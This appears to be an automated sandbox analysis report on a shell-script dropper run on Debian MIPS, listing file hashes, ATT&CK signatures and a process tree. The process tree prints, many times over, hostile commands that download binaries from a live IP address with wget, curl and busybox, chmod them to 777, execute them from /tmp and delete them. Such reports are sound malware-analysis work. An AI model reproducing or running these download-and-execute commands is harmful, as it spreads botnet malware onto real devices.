Analysis
-
max time kernel
150s -
max time network
156s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
21/11/2024, 08:14
Static task
static1
Behavioral task
behavioral1
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
-
Size
10KB
-
MD5
77bee17b866cc1fd41dd0e6795516a37
-
SHA1
fbe900100ffafc804c69a94b5ee81405100c02e5
-
SHA256
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f
-
SHA512
6284423f5b87140261dee3ec564d00d38f4dd59dd41f86a9d342027230a4012db3224b4cb8e9341a4a30ffcb73b822319b88a65d51c55678886b6a708fa62d4d
-
SSDEEP
192:YnrtGG7NhRmOJQM4+2IJ7Rk8UD+u0KCaHHRYbAQrHB+GvrHB+GRnrtGGJNhRmOuX:8NhRmOJQM4+xJ7dfKOAQrHB+GvrHB+Gy
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 21 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process
924 chmod
737 chmod
767 chmod
799 chmod
827 chmod
893 chmod
809 chmod
875 chmod
905 chmod
933 chmod
746 chmod
850 chmod
869 chmod
887 chmod
899 chmod
918 chmod
729 chmod
815 chmod
863 chmod
881 chmod
911 chmod
-
Executes dropped EXE 21 IoCs
-
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
-
Writes file to tmp directory 21 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh/tmp/bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh1⤵PID:699
-
/bin/rm/bin/rm bins.sh2⤵PID:702
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:709
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:718
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:726
-
-
/bin/chmodchmod 777 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- File and Directory Permissions Modification
PID:729
-
-
/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n./b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Executes dropped EXE
PID:731
-
-
/bin/rmrm b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:732
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:733
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:736
-
-
/bin/chmodchmod 777 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr./pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Executes dropped EXE
PID:738
-
-
/bin/rmrm pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:739
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:740
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:741
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:745
-
-
/bin/chmodchmod 777 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij./R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:748
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:749
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:764
-
-
/bin/chmodchmod 777 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR./rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Executes dropped EXE
PID:769
-
-
/bin/rmrm rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:772
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:773
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:784
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:795
-
-
/bin/chmodchmod 777 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK./rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Executes dropped EXE
PID:800
-
-
/bin/rmrm rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:803
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:804
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:807
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:808
-
-
/bin/chmodchmod 777 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll./ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:811
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:812
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:814
-
-
/bin/chmodchmod 777 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD./2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:817
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:818
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:823
-
-
/bin/chmodchmod 777 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd./sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- Executes dropped EXE
PID:828
-
-
/bin/rmrm sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:831
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:832
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:838
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:846
-
-
/bin/chmodchmod 777 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- File and Directory Permissions Modification
PID:850
-
-
/tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv./7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:855
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:856
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:862
-
-
/bin/chmodchmod 777 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI./5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:865
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:866
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:868
-
-
/bin/chmodchmod 777 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4./FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:871
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:872
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:874
-
-
/bin/chmodchmod 777 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH./tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:877
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:878
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:880
-
-
/bin/chmodchmod 777 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb./2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:883
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:884
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:886
-
-
/bin/chmodchmod 777 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN./e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:889
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:890
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:892
-
-
/bin/chmodchmod 777 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb./2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:895
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:896
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:898
-
-
/bin/chmodchmod 777 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN./e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:901
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:902
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:904
-
-
/bin/chmodchmod 777 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n./b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:907
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:908
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:910
-
-
/bin/chmodchmod 777 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr./pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:913
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:914
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:917
-
-
/bin/chmodchmod 777 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij./R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:920
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:921
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:923
-
-
/bin/chmodchmod 777 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR./rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:929
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:930
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:932
-
-
/bin/chmodchmod 777 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK./rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:935
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:936
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- Reads runtime system information
PID:937
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97